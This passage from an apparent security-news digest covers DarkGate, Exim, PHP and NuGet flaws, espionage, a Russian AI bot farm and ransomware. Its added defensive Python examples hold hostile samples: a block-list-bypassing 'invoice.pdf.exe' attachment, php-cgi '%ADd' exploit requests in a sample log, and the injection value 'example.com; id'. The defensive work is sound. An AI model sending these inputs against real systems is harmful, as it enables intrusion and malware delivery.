DarkGate, which first emerged in 2018, has evolved into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.
Attacks involving the malware have particularly witnessed a surge in recent months in the aftermath of the multinational law enforcement takedown of the QakBot infrastructure in August 2023.
The campaign documented by Unit 42 commences with Microsoft Excel (.xlsx) files that, when opened, urge targets to click on an embedded Open button, which, in turn, fetches and runs VBS code hosted on a Samba file share.
The VBS script is configured to retrieve and execute a PowerShell script, which is then used to download an AutoHotKey-based DarkGate package.
Alternate sequences using JavaScript files instead of VBS are no different in that they are also engineered to download and run the follow-up PowerShell script.
DarkGate works by scanning for various anti-malware programs and checking the CPU information to determine if it's running on a physical host or a virtual environment, thereby allowing it to hinder analysis. It also examines the host's running processes to determine the presence of reverse engineering tools, debuggers, or virtualization software.
"DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text," the researchers said.
"As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses."
Australian Defence Force Private and Husband Charged with Espionage for Russia
12.7.24
BigBrothers
The Hacker News
Two Russian-born Australian citizens have been arrested and charged in the country for spying on behalf of Russia as part of a "complex" law enforcement operation codenamed BURGAZADA.
This includes a 40-year-old woman, an Australian Defence Force (ADF) Army Private, and her husband, a 62-year-old self-employed laborer. Media reports have identified them as Kira Korolev and Igor Korolev, respectively, noting that they had been in Australia for over a decade.
The married couple were arrested at their home in the Brisbane suburb of Everton Park on July 11, 2024, the Australian Federal Police (AFP) said in a statement. They have been charged with one count each of preparing for an espionage offense, which carries a maximum penalty of 15 years' imprisonment.
"It is the first time an espionage offense has been laid in Australia since new laws were introduced by the Commonwealth in 2018," the AFP said.
The federal law enforcement agency has alleged the pair colluded together to obtain sensitive information after the woman traveled to Russia while on a long-term leave from the ADF since 2023.
She is said to have instructed her husband, who remained in Australia, to log into her official work account and instructed him to access specific information and send it directly to her private email account while she was overseas.
"The woman's ADF account credentials were used on a number of occasions to access sensitive ADF information, with the intent to provide it to Russian authorities," the AFP said.
Although the exact documents that were accessed were not disclosed, the AFP said they related to Australian national security interests. An investigation into whether the information was handed over to Russia remains ongoing.
"Espionage is an insidious crime, and at a time of global instability, state actors have ramped-up their efforts to obtain information held by Western democracies, including Australia," AFP Commissioner Reece Kershaw said.
"Espionage is not a victimless crime. It has the potential to impact on Australia's sovereignty, safety and way of life."
The arrests mark the third time individuals have been charged with espionage or foreign interference related offenses since their incorporation into the Criminal Code Act 1995.
Last April, a New South Wales man, 55, was charged with providing information about "Australian defense, economic and national security arrangements" to two individuals associated with a foreign intelligence service who are suspected to be undertaking intelligence gathering activities.
Then in late February 2024, a 68-year-old man from Melbourne was sentenced to two years and nine months in prison for attempting to influence a Federal Parliamentarian on behalf of a foreign government.
Mike Burgess, Director-General of Security in charge of the Australian Security Intelligence Organization (ASIO), said the ongoing threat of espionage is "real," and that "multiple countries are seeking to steal Australia's secrets."
Critical Exim Mail Server Vulnerability Exposes Millions to Malicious Attachments
12.7.24
Vulnerability
The Hacker News
A critical security issue has been disclosed in the Exim mail transfer agent that could enable threat actors to deliver malicious attachments to target users' inboxes.
The vulnerability, tracked as CVE-2024-39929, has a CVSS score of 9.1 out of 10.0. It has been addressed in version 4.98.
"Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users," according to a description shared on the U.S. National Vulnerability Database (NVD).
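RFC 2231 lets a sender split one parameter value into numbered pieces (`filename*0`, `filename*1`, ...) and, with a trailing asterisk, percent-encode it with a charset tag, so the final extension may only exist after the pieces are reassembled. The added example below (constructed for this page, not Exim's code and not the advisory's proof of concept) contrasts a shortcut that takes the first filename-looking parameter from the raw header with reassembly through Python's standard library, then applies an extension block list to each result. The messages, the block list and the naive regex are assumptions chosen to illustrate the general pitfall, not a reproduction of the exact Exim parsing defect.

```python
import email
import os
import re

BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".com", ".js", ".vbs", ".ps1", ".lnk", ".hta"}

# Constructed message: the attachment name is split across RFC 2231
# continuation parameters, folded over several header lines.
CONTINUATION_MESSAGE = (
    "From: billing@example.test\r\n"
    "To: user@example.test\r\n"
    "Subject: Invoice\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Disposition: attachment;\r\n"
    " filename*0=\"invoice.pdf\";\r\n"
    " filename*1=\".exe\"\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    "AAAAAAAA\r\n"
)

# Same name, this time in the charset-tagged, percent-encoded form.
ENCODED_MESSAGE = CONTINUATION_MESSAGE.replace(
    "Content-Disposition: attachment;\r\n filename*0=\"invoice.pdf\";\r\n filename*1=\".exe\"\r\n",
    "Content-Disposition: attachment; filename*=UTF-8''invoice%2Epdf%2Eexe\r\n",
)

# The shortcut a filter must not take: grab the first filename-looking
# parameter from the raw header text and stop there.
NAIVE_FILENAME = re.compile(r"filename(?:\*\d*)?\*?=\s*\"?([^\";\r\n]+)", re.I)


def naive_filename(raw_message: str):
    m = NAIVE_FILENAME.search(raw_message)
    return m.group(1) if m else None


def reassembled_filename(raw_message: str):
    """Parse the message; get_filename() joins filename*0, filename*1, ... and decodes filename*=."""
    msg = email.message_from_string(raw_message)
    return msg.get_filename()


def has_blocked_extension(filename: str) -> bool:
    """Check the final extension of the complete, decoded name."""
    return os.path.splitext(filename.lower())[1] in BLOCKED_EXTENSIONS


def attachment_verdict(raw_message: str) -> dict:
    """Show what each parsing strategy sees and whether it would block the attachment."""
    naive = naive_filename(raw_message)
    full = reassembled_filename(raw_message)
    return {
        "naive_name": naive,
        "naive_blocks": bool(naive) and has_blocked_extension(naive),
        "full_name": full,
        "correct_blocks": bool(full) and has_blocked_extension(full),
    }


if __name__ == "__main__":
    for raw in (CONTINUATION_MESSAGE, ENCODED_MESSAGE):
        print(attachment_verdict(raw))
```

For Exim itself the fix is the 4.98 upgrade, since `$mime_filename` is populated inside the MTA before any ACL runs. For a downstream filter the lesson carries over: reassemble and decode every parameter part first, normalise case, and test the final extension of the complete name rather than whatever the first `filename` token happens to say.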
Exim is a free mail transfer agent used on hosts running Unix or Unix-like operating systems. It was first released in 1995 for use at the University of Cambridge.
Attack surface management firm Censys said 4,830,719 of the 6,540,044 public-facing SMTP mail servers are running Exim. As of July 12, 2024, 1,563,085 internet-accessible Exim servers are running a potentially vulnerable version (4.97.1 or earlier).
A majority of the vulnerable instances are located in the U.S., Russia, and Canada.
"The vulnerability could allow a remote attacker to bypass filename extension blocking protection measures and deliver executable attachments directly to end-users' mailboxes," it noted. "If a user were to download or run one of these malicious files, the system could be compromised."
This also means that prospective targets must click on an attached executable for the attack to be successful. While there are no reports of active exploitation of the flaw, it's essential that users move quickly to apply the patches to mitigate potential threats.
The development comes almost a year after the project maintainers addressed a set of six vulnerabilities in Exim that could result in information disclosure and remote code execution.
U.S. Seizes Domains Used by AI-Powered Russian Bot Farm for Disinformation
12.7.24
AI
The Hacker News
The U.S. Department of Justice (DoJ) said it seized two internet domains and searched nearly 1,000 social media accounts that Russian threat actors allegedly used to covertly spread pro-Kremlin disinformation in the country and abroad on a large scale.
"The social media bot farm used elements of AI to create fictitious social media profiles — often purporting to belong to individuals in the United States — which the operators then used to promote messages in support of Russian government objectives," the DoJ said.
The bot network, comprising 968 accounts on X, is said to be part of an elaborate scheme hatched by an employee of Russian state-owned media outlet RT (formerly Russia Today), sponsored by the Kremlin, and aided by an officer of Russia's Federal Security Service (FSB), who created and led an unnamed private intelligence organization.
The developmental efforts for the bot farm began in April 2022 when the individuals procured online infrastructure while anonymizing their identities and locations. The goal of the organization, per the DoJ, was to further Russian interests by spreading disinformation through fictitious online personas representing various nationalities.
The phony social media accounts were registered using private email servers that relied on two domains – mlrtr[.]com and otanmail[.]com – that were purchased from domain registrar Namecheap. X has since suspended the bot accounts for violating its terms of service.
The information operation -- which targeted the U.S., Poland, Germany, the Netherlands, Spain, Ukraine, and Israel -- was pulled off using an AI-powered software package dubbed Meliorator that facilitated the "en masse" creation and operation of said social media bot farm.
"Using this tool, RT affiliates disseminated disinformation to and about a number of countries, including the United States, Poland, Germany, the Netherlands, Spain, Ukraine, and Israel," law enforcement agencies from Canada, the Netherlands, and the U.S. said.
Meliorator includes an administrator panel called Brigadir and a backend tool called Taras, which is used to control the authentic-appearing accounts, whose profile pictures and biographical information were generated using an open-source program called Faker.
Each of these accounts had a distinct identity or "soul" based on one of the three bot archetypes: those that propagate political ideologies favorable to the Russian government, those that like messaging already shared by other bots, and those that perpetuate disinformation shared by both bot and non-bot accounts.
While the software package was only identified on X, further analysis has revealed the threat actors' intentions to extend its functionality to cover other social media platforms.
Furthermore, the system slipped through X's safeguards for verifying the authenticity of users by automatically copying one-time passcodes sent to the registered email addresses and assigning proxy IP addresses to AI-generated personas based on their assumed location.
"Bot persona accounts make obvious attempts to avoid bans for terms of service violations and avoid being noticed as bots by blending into the larger social media environment," the agencies said. "Much like authentic accounts, these bots follow genuine accounts reflective of their political leanings and interests listed in their biography."
"Farming is a beloved pastime for millions of Russians," RT was quoted as saying to Bloomberg in response to the allegations, without directly refuting them.
The development marks the first time the U.S. has publicly pointed fingers at a foreign government for using AI in a foreign influence operation. No criminal charges have been made public in the case, but an investigation into the activity remains ongoing.
Doppelganger Lives On
In recent months Google, Meta, and OpenAI have warned that Russian disinformation operations, including those orchestrated by a network dubbed Doppelganger, have repeatedly leveraged their platforms to disseminate pro-Russian propaganda.
"The campaign is still active as well as the network and server infrastructure responsible for the content distribution," Qurium and EU DisinfoLab said in a new report published Thursday.
"Astonishingly, Doppelganger does not operate from a hidden data center in a Vladivostok Fortress or from a remote military Bat cave but from newly created Russian providers operating inside the largest data centers in Europe. Doppelganger operates in close association with cybercriminal activities and affiliate advertisement networks."
At the heart of the operation is a network of bulletproof hosting providers encompassing Aeza, Evil Empire, GIR, and TNSECURITY, which have also harbored command-and-control domains for different malware families like Stealc, Amadey, Agent Tesla, Glupteba, Raccoon Stealer, RisePro, RedLine Stealer, RevengeRAT, Lumma, Meduza, and Mystic.
What's more, NewsGuard, which provides a host of tools to counter misinformation, recently found that popular AI chatbots are prone to repeating "fabricated narratives from state-affiliated sites masquerading as local news outlets in one third of their responses."
Influence Operations from Iran and China
It also comes as the U.S. Office of the Director of National Intelligence (ODNI) said that Iran is "becoming increasingly aggressive in their foreign influence efforts, seeking to stoke discord and undermine confidence in our democratic institutions."
The agency further noted that the Iranian actors continue to refine their cyber and influence activities, using social media platforms and issuing threats, and that they are amplifying pro-Gaza protests in the U.S. by posing as activists online.
Google, for its part, said it blocked over 10,000 instances of Dragon Bridge (aka Spamouflage Dragon) activity across YouTube and Blogger in the first quarter of 2024. Dragon Bridge is the name given to a spammy-yet-persistent influence network linked to China that promoted narratives portraying the U.S. in a negative light, as well as content related to the elections in Taiwan and the Israel-Hamas war, targeting Chinese speakers.
In comparison, the tech giant disrupted no less than 50,000 such instances in 2022 and 65,000 more in 2023. In all, it has prevented over 175,000 instances to date during the network's lifetime.
"Despite their continued profuse content production and the scale of their operations, DRAGONBRIDGE achieves practically no organic engagement from real viewers," Threat Analysis Group (TAG) researcher Zak Butler said. "In the cases where DRAGONBRIDGE content did receive engagement, it was almost entirely inauthentic, coming from other DRAGONBRIDGE accounts and not from authentic users."
Palo Alto Networks Patches Critical Flaw in Expedition Migration Tool
12.7.24
Vulnerability
The Hacker News
Palo Alto Networks has released security updates to address five security flaws
impacting its products, including a critical bug that could lead to an
authentication bypass.
Cataloged as CVE-2024-5910 (CVSS score: 9.3), the vulnerability has been described as a case of missing authentication in its Expedition migration tool that could lead to an admin account takeover.
"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition," the company said in an advisory. "Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue."
The flaw impacts all versions of Expedition prior to version 1.2.92, which remediates the problem. Synopsys Cybersecurity Research Center's (CyRC) Brian Hysell has been credited with discovering and reporting the issue.
While there is no evidence that the vulnerability has been exploited in the wild, users are advised to update to the latest version to secure against potential threats.
As a workaround, Palo Alto Networks recommends that network access to Expedition be restricted to authorized users, hosts, or networks.
Also fixed by the American cybersecurity firm is a newly
disclosed flaw in the RADIUS protocol called BlastRADIUS (CVE-2024-3596) that
could allow a bad actor with capabilities to perform an adversary-in-the-middle
(AitM) attack between Palo Alto Networks PAN-OS firewall and a RADIUS server to
sidestep authentication.
The vulnerability then permits the attacker to "escalate privileges to
'superuser' when RADIUS authentication is in use and either CHAP or PAP is
selected in the RADIUS server profile," it said.
The following products are affected by the shortcomings:
PAN-OS 11.1 (versions < 11.1.3, fixed in >= 11.1.3)
PAN-OS 11.0 (versions < 11.0.4-h4, fixed in >= 11.0.4-h4)
PAN-OS 10.2 (versions < 10.2.10, fixed in >= 10.2.10)
PAN-OS 10.1 (versions < 10.1.14, fixed in >= 10.1.14)
PAN-OS 9.1 (versions < 9.1.19, fixed in >= 9.1.19)
Prisma Access (all versions, fix expected to be released on July 30)
It also noted that neither CHAP nor PAP should be used unless they are
encapsulated by an encrypted tunnel since the authentication protocols do not
offer Transport Layer Security (TLS). They are not vulnerable in cases where
they are used in conjunction with a TLS tunnel.
Likewise, PAN-OS firewalls configured to use EAP-TTLS with PAP as the authentication protocol for a RADIUS server are not susceptible to the attack.
60 New Malicious Packages Uncovered in NuGet Supply Chain Attack
12.7.24
Virus
The Hacker News
Threat actors have been observed publishing a new wave of malicious packages to
the NuGet package manager as part of an ongoing campaign that began in August
2023, while also adding a new layer of stealth to evade detection.
The fresh packages, about 60 in number and spanning 290 versions, demonstrate a refined approach over the previous set that came to light in October 2023, software supply chain security firm ReversingLabs said.
The attackers pivoted from using NuGet's MSBuild integrations to "a strategy
that uses simple, obfuscated downloaders that are inserted into legitimate PE
binary files using Intermediary Language (IL) Weaving, a .NET programming
technique for modifying an application's code after compilation," security
researcher Karlo Zanki said.
The end goal of the counterfeit packages, both old and new, is to deliver an off-the-shelf remote access trojan called SeroXen RAT. All the identified packages have since been taken down.
The latest collection of packages is characterized by the use of a novel technique called IL weaving that makes it possible to inject malicious functionality into a Portable Executable (PE) .NET binary associated with a legitimate NuGet package.
This includes taking a popular open-source package like Guna.UI2.WinForms and patching it with the aforementioned method to create an imposter package named "Gսոa.UI3.Wіnfօrms," which uses homoglyphs to substitute the letters "u," "n," "i," and "o" with their look-alikes "ս" (\u057D), "ո" (\u0578), "і" (\u0456), and "օ" (\u0585).
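A defender-side check for the homoglyph trick described above, added here as an example and not code from ReversingLabs or the NuGet project: it flags non-ASCII code points and mixed scripts in a package id, folds the four substitutions the write-up names back to ASCII, and compares the result against a trusted list with a small edit-distance tolerance so that "UI3" versus "UI2" is still caught. The confusables table is a constructed excerpt (a real check should load the full Unicode confusables list), and the trusted list and distance threshold are assumptions.

```python
import unicodedata

# Constructed excerpt of a confusables table: only the four substitutions the
# write-up names. Assumption: a production check would load the full Unicode
# confusables.txt rather than this excerpt.
CONFUSABLES = {
    "\u057d": "u",  # ARMENIAN SMALL LETTER SEH
    "\u0578": "n",  # ARMENIAN SMALL LETTER VO
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0585": "o",  # ARMENIAN SMALL LETTER OH
}

# The imposter package id from the write-up, spelled out by code point.
IMPOSTER_NAME = "G\u057d\u0578a.UI3.W\u0456nf\u0585rms"

# Assumption: the legitimate packages an organisation wants to protect.
TRUSTED_PACKAGES = ["Guna.UI2.WinForms"]


def script_of(ch: str) -> str:
    """First word of the Unicode character name, e.g. 'LATIN', 'ARMENIAN', 'CYRILLIC'."""
    return unicodedata.name(ch, "").split(" ")[0]


def scripts_in(name: str) -> set[str]:
    """Scripts used by the letters of a package id (digits and punctuation ignored)."""
    return {script_of(c) for c in name if c.isalpha()}


def skeleton(name: str) -> str:
    """Fold listed confusables to ASCII, then normalise and casefold for comparison."""
    folded = "".join(CONFUSABLES.get(c, c) for c in name)
    return unicodedata.normalize("NFKC", folded).casefold()


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; inputs are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_package_name(name: str, trusted=TRUSTED_PACKAGES, max_distance: int = 1) -> list[str]:
    """Return findings for a package id; an empty list means nothing looked off.

    Findings: non-ASCII code points, mixed scripts, and a skeleton within
    `max_distance` edits of a trusted package id (so UI2 vs UI3 is still reported).
    """
    findings = []
    non_ascii = [c for c in name if ord(c) > 127]
    if non_ascii:
        findings.append("non-ascii:" + ",".join(f"U+{ord(c):04X}" for c in non_ascii))
    scripts = scripts_in(name)
    if len(scripts) > 1:
        findings.append("mixed-script:" + "+".join(sorted(scripts)))
    sk = skeleton(name)
    for t in trusted:
        if name == t:
            continue
        d = edit_distance(sk, skeleton(t))
        if d <= max_distance:
            findings.append(f"lookalike-of:{t}:distance={d}")
    return findings


if __name__ == "__main__":
    for pkg in (IMPOSTER_NAME, "Guna.UI2.WinForms"):
        print(pkg, "->", audit_package_name(pkg) or "clean")
```

The mixed-script finding is the cheapest signal: a .NET package id that mixes Latin with Armenian or Cyrillic letters has no legitimate reason to exist, so that rule alone would have flagged this case before any comparison against a trusted list.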
"Threat actors are constantly evolving the methods and tactics they use to
compromise and infect their victims with malicious code that is used to extract
sensitive data or provide attackers with control over IT assets," Zanki said.
"This latest campaign highlights new ways in which malicious actors are scheming to fool developers as well as security teams into downloading and using malicious or tampered with packages from popular open source package managers like NuGet."
PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks
11.7.24
Exploit
The Hacker News
Multiple threat actors have been observed exploiting a recently disclosed
security flaw in PHP to deliver remote access trojans, cryptocurrency miners,
and distributed denial-of-service (DDoS) botnets.
The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It was publicly disclosed in early June 2024.
"CVE-2024-4577 is a flaw that allows an attacker to escape the command line and
pass arguments to be interpreted directly by PHP," Akamai researchers Kyle
Lefton, Allen West, and Sam Tinklenberg said in a Wednesday analysis. "The
vulnerability itself lies in how Unicode characters are converted into ASCII."
The web infrastructure company said it began observing exploit attempts against
its honeypot servers targeting the PHP flaw within 24 hours of it being public
knowledge.
This included exploits designed to deliver a remote access trojan called Gh0st RAT, cryptocurrency miners like RedTail and XMRig, and a DDoS botnet named Muhstik.
"The attacker sent a request similar to the others seen in previous RedTail operations, abusing the soft hyphen flaw with '%ADd,' to execute a wget request for a shell script," the researchers explained. "This script makes an additional network request to the same Russia-based IP address to retrieve an x86 version of the RedTail crypto-mining malware."
Last month, Imperva also revealed that CVE-2024-4577 is being exploited by TellYouThePass ransomware actors to distribute a .NET variant of the file-encrypting malware.
Users and organizations relying on PHP are recommended to update their installations to the latest version to safeguard against active threats.
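A log check for the soft-hyphen pattern the researchers quote above, added here as an example and not Akamai's code: it percent-decodes each request's query string to bytes and flags a 0xAD byte that is not part of a valid UTF-8 sequence, so a legitimate "í" (%C3%AD) is not reported while a lone %AD is. The log lines are constructed, and the combined-log regex is an assumption about the log format in use.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jul/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.11 - - [11/Jul/2024:10:01:05 +0000] "POST /php-cgi/php-cgi.exe?%ADd HTTP/1.1" 200 0
203.0.113.12 - - [11/Jul/2024:10:01:09 +0000] "GET /search.php?q=Mar%C3%ADa HTTP/1.1" 200 300
203.0.113.13 - - [11/Jul/2024:10:01:12 +0000] "GET /cgi-bin/php-cgi.exe?%adD HTTP/1.1" 404 0
"""

# Assumption: combined-log layout: ip ident user [ts] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)


def has_stray_soft_hyphen(query: str) -> bool:
    """True if the percent-decoded query holds a 0xAD byte outside valid UTF-8.

    surrogateescape maps each undecodable byte 0xXX to U+DCXX, so a lone %AD
    becomes U+DCAD, while a valid sequence such as %C3%AD decodes to the letter
    'í' and is not flagged.
    """
    raw = unquote_to_bytes(query)
    return "\udcad" in raw.decode("utf-8", errors="surrogateescape")


def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Return (ip, uri, status) for each request whose query carries a stray %AD."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        if has_stray_soft_hyphen(urlsplit(m["uri"]).query):
            hits.append((m["ip"], m["uri"], m["status"]))
    return hits


if __name__ == "__main__":
    for ip, uri, status in scan_log(SAMPLE_LOG):
        print(f"stray soft hyphen in query: {ip} {uri} -> {status}")
```

Matching on the decoded byte rather than on the literal text "%AD" is what keeps the check case-insensitive (the fourth line uses "%ad") and avoids false positives on ordinary UTF-8 accented characters whose second byte happens to be 0xAD.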
"The continuously shrinking time that defenders have to protect themselves after
a new vulnerability disclosure is yet another critical security risk," the
researchers said. "This is especially true for this PHP vulnerability because of
its high exploitability and quick adoption by threat actors."
The disclosure comes as Cloudflare said it recorded a 20% year-over-year
increase in DDoS attacks in the second quarter of 2024, and that it mitigated
8.5 million DDoS attacks during the first six months. In comparison, the company
blocked 14 million DDoS attacks for the entirety of 2023.
"Overall, the number of DDoS attacks in Q2 decreased by 11% quarter-over-quarter, but increased 20% year-over-year," researchers Omer Yoachimik and Jorge Pacheco said in the DDoS threat report for Q2 2024.
What's more, known DDoS botnets accounted for half of all HTTP DDoS attacks. Fake user agents and headless browsers (29%), suspicious HTTP attributes (13%), and generic floods (7%) were the other prominent HTTP DDoS attack vectors.
The most attacked country during the time period was China, followed by Turkey, Singapore, Hong Kong, Russia, Brazil, Thailand, Canada, Taiwan, and Kyrgyzstan. Information technology and services, telecom, consumer goods, education, construction, and food and beverage emerged as the top sectors targeted by DDoS attacks.
"Argentina was ranked as the largest source of DDoS attacks in the second quarter of 2024," the researchers said. "Indonesia followed closely in second place, followed by the Netherlands in third."
GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Jobs
11.7.24
Vulnerability
The Hacker News
GitLab has shipped another round of updates to close out security flaws in its
software development platform, including a critical bug that allows an attacker
to run pipeline jobs as an arbitrary user.
Tracked as CVE-2024-6385, the vulnerability carries a CVSS score of 9.6 out of a maximum of 10.0.
"An issue was discovered in GitLab CE/EE affecting versions 15.8 prior to 16.11.6, 17.0 prior to 17.0.4, and 17.1 prior to 17.1.2, which allows an attacker to trigger a pipeline as another user under certain circumstances," the company said in a Wednesday advisory.
It's worth noting that the company patched a similar bug late last month
(CVE-2024-5655, CVSS score: 9.6) that could also be weaponized to run pipelines
as other users.
Also addressed by GitLab is a medium-severity issue (CVE-2024-5257, CVSS score:
4.9) that allows a Developer user with admin_compliance_framework permissions to
modify the URL for a group namespace.
All the security shortcomings have been fixed in GitLab Community Edition (CE) and Enterprise Edition (EE) versions 17.1.2, 17.0.4, and 16.11.6.
The disclosure comes as Citrix released updates for a critical, improper authentication flaw impacting NetScaler Console (formerly NetScaler ADM), NetScaler SDX, and NetScaler Agent (CVE-2024-6235, CVSS score: 9.4) that could result in information disclosure.
Patches have also been released by Broadcom for two medium-severity injection vulnerabilities in VMware Cloud Director (CVE-2024-22277, CVSS score: 6.4) and VMware Aria Automation (CVE-2024-22280, CVSS score: 8.5) that could be abused to execute malicious code using specially crafted HTML tags and SQL queries, respectively.
CISA Releases Bulletins to Tackle Software Flaws
The developments also follow a new bulletin released by the U.S. Cybersecurity
and Infrastructure Security Agency (CISA) and the Federal Bureau of
Investigation (FBI) urging technology manufacturers to weed out operating system
(OS) command injection flaws in software that allow threat actors to remotely
execute code on network edge devices.
Such flaws arise when user input is not adequately sanitized and validated when constructing commands to be executed on the underlying operating system, thereby permitting an adversary to smuggle arbitrary commands that can lead to the deployment of malware or information theft.
"OS command injection vulnerabilities have long been preventable by clearly separating user input from the contents of a command," the agencies said. "Despite this finding, OS command injection vulnerabilities — many of which result from CWE-78 — are still a prevalent class of vulnerability."
The alert is the third such caution issued by CISA and FBI since the start of
the year. The agencies previously sent out two other alerts about the need for
eliminating SQL injection (SQLi) and path traversal vulnerabilities in March and
May 2024.
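The separation of user input from command contents that the agencies describe, shown as an added Python example (not code from CISA or the FBI): the first function reproduces the CWE-78 pattern of pasting input into a shell command line, and the remaining functions build an argument vector that no shell parses, with allow-list validation of the host value. The hostname pattern and the choice of `ping` as the wrapped command are assumptions for illustration.

```python
import re
import subprocess

# Assumption: hosts are plain DNS names or IPv4 literals; adjust for your inputs.
# A leading '-' is excluded so the value cannot be parsed as a ping option.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def vulnerable_ping_command(host: str) -> str:
    """CWE-78 pattern: untrusted input concatenated into a shell command line.

    Shown for contrast only and never executed here. Handing this string to a
    shell (subprocess.run(cmd, shell=True)) lets metacharacters in `host` such
    as ';' or '$(...)' become commands of their own.
    """
    return f"ping -c 1 {host}"


def is_safe_host(host: str) -> bool:
    """Allow-list check: hostname characters only, non-empty, no leading '-'."""
    return HOSTNAME_RE.fullmatch(host) is not None


def validate_host(host: str) -> str:
    """Reject anything outside the allow-list before it reaches a command."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return host


def build_ping_argv(host: str) -> list[str]:
    """Separate command from data: the host is a single argv element, no shell involved."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> int:
    """Execute without a shell and return ping's exit status."""
    completed = subprocess.run(
        build_ping_argv(host), capture_output=True, text=True, timeout=15
    )
    return completed.returncode


if __name__ == "__main__":
    # The string a shell would have executed under the vulnerable pattern.
    print(vulnerable_ping_command("example.com; id"))
    print(build_ping_argv("example.com"))
    try:
        build_ping_argv("example.com; id")
    except ValueError as exc:
        print("blocked:", exc)
```

The argv form is the structural fix the bulletin calls for; the allow-list is defence in depth, since even without a shell a value starting with "-" could still change how the invoked program interprets its arguments.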
Last month, CISA, along with cybersecurity agencies from Canada and New Zealand, also released guidance recommending that businesses adopt more robust security solutions — such as Zero Trust, Secure Service Edge (SSE), and Secure Access Service Edge (SASE) — that provide greater visibility of network activity.
"By using risk-based access control policies to deliver decisions through policy decision engines, these solutions integrate security and access control, strengthening an organization's usability and security through adaptive policies," the authoring agencies noted.
New Ransomware Group Exploiting Veeam Backup Software Vulnerability
11.7.24
Ransom
The Hacker News
A now-patched security flaw in Veeam Backup & Replication software is being
exploited by a nascent ransomware operation known as EstateRansomware.
Singapore-headquartered Group-IB, which discovered the threat actor in early April 2024, said the modus operandi involved the exploitation of CVE-2023-27532 (CVSS score: 7.5) to carry out the malicious activities.
Initial access to the target environment is said to have been facilitated by means of a Fortinet FortiGate firewall SSL VPN appliance using a dormant account.
"The threat actor pivoted laterally from the FortiGate Firewall through the SSL
VPN service to access the failover server," security researcher Yeo Zi Wei said
in an analysis published today.
"Before the ransomware attack, there were VPN brute-force attempts noted in
April 2024 using a dormant account identified as 'Acc1.' Several days later, a
successful VPN login using 'Acc1' was traced back to the remote IP address
149.28.106[.]252."
Next, the threat actors proceeded to establish RDP connections from the firewall to the failover server, followed by deploying a persistent backdoor named "svchost.exe" that's executed daily through a scheduled task.
Subsequent access to the network was accomplished using the backdoor to evade detection. The primary responsibility of the backdoor is to connect to a command-and-control (C2) server over HTTP and execute arbitrary commands issued by the attacker.
Group-IB said it observed the actor exploiting the Veeam flaw CVE-2023-27532 to enable xp_cmdshell on the backup server and create a rogue user account named "VeeamBkp," alongside conducting network discovery, enumeration, and credential harvesting activities using tools like NetScan, AdFind, and NitSoft via the newly created account.
"This exploitation potentially involved an attack originating from the VeeamHax folder on the file server against the vulnerable version of Veeam Backup & Replication software installed on the backup server," Zi Wei hypothesized.
"This activity facilitated the activation of the xp_cmdshell stored procedure and subsequent creation of the 'VeeamBkp' account."
The attack culminated in the deployment of the ransomware, but not before taking
steps to impair defenses and moving laterally from the AD server to all other
servers and workstations using compromised domain accounts.
"Windows Defender was permanently disabled using DC.exe [Defender Control],
followed by ransomware deployment and execution with PsExec.exe," Group-IB said.
The disclosure comes as Cisco Talos revealed that most ransomware gangs
prioritize establishing initial access using security flaws in public-facing
applications, phishing attachments, or breaching valid accounts, and
circumventing defenses in their attack chains to increase dwell time in victim
networks.
The double extortion model of exfiltrating data prior to encrypting files has further given rise to custom tools developed by the actors (e.g., Exmatter, Exbyte, and StealBit) to send the confidential information to an adversary-controlled infrastructure.
This necessitates that these e-crime groups establish long-term access to explore the environment in order to understand the network's structure, locate resources that can support the attack, elevate their privileges, or allow them to blend in, and identify data of value that can be stolen.
"Over the past year, we have witnessed major shifts in the ransomware space with the emergence of multiple new ransomware groups, each exhibiting unique goals, operational structures and victimology," Talos said.
"The diversification highlights a shift toward more boutique-targeted cybercriminal activities, as groups such as Hunters International, Cactus, and Akira carve out specific niches, focusing on distinct operational goals and stylistic choices to differentiate themselves."
Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk
11.7.24
APT
The Hacker News
The China-linked advanced persistent threat (APT) group codenamed APT41 is
suspected to be using an "advanced and upgraded version" of a known malware
